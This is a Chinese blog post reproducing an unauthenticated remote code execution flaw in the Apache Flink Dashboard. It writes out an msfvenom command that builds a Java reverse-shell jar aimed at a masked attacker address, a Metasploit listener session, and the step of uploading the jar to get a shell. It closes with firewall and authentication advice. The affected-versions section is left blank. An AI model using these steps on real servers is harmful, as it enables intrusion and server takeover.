Apache Flink未授权访问远程代码命令执行的复现


这篇文章的内容主要围绕Apache Flink未授权访问远程代码命令执行的复现进行讲述,文章内容清晰易懂,条理清晰,非常适合新手学习,值得大家去阅读。感兴趣的朋友可以跟随小编一起阅读吧。希望大家通过这篇文章有所收获!Apache Flink未授权访问-远程代码命令执行漏洞复现Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。二、影响版本Apache Flink
三、漏洞复现1、生成反弹jar包msfvenom-p java/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4444-f jar > rce.jar2、msf设置监听msf5> use exploit/multi/handler [*]Using configured payload generic/shell_reverse_tcpmsf5exploit(multi/handler) > set payload java/shell/reverse_tcp payload=> java/shell/reverse_tcpmsf5exploit(multi/handler) > show options Moduleoptions (exploit/multi/handler):NameCurrent Setting Required Description——————- ——– ———–Payloadoptions (java/shell/reverse_tcp):NameCurrent Setting Required Description——————- ——– ———–LHOSTyes The listen address (an interface may be specified)LPORT4444 yes The listen portExploittarget:IdName——0Wildcard Targetmsf5exploit(multi/handler) > set LHOST XX.XX.XX.XXLHOST=> XX.XX.XX.XXmsf5exploit(multi/handler) > exploit [*]Started reverse TCP handler on XX.XX.XX.XX:44443、上传Jar包,并且提交监听接受反弹的shell,获取权限四、安全建议1. 请关注Apache Flink官方以便获取更新信息:https://flink.apache.org/2.针对Apache免费云主机域名FlinkDashboard设置防火墙策略(禁止Dashboard对外访问,或者确保只对可信端点开放), 仅允许白名单IP进行访问,并在Web代理中增加对该服务的Digest认证,防止未授权访问。感谢你的阅读,相信你对“Apache Flink未授权访问远程代码命令执行的复现”这一问题有一定的了解,快去动手实践吧,如果想了解更多相关知识点,可以关注云编程开发博客网站!小编会继续为大家带来更好的文章!

相关推荐: 如何绕过Uber的CSP防御成功XSS

如何绕过Uber的CSP防御成功XSS,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。这次,我打算在Uber的子域上挖掘一些“开放重定向”漏洞。虽然,我知道Uber并不将“开放重定向…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/07 16:24
下一篇 02/07 16:51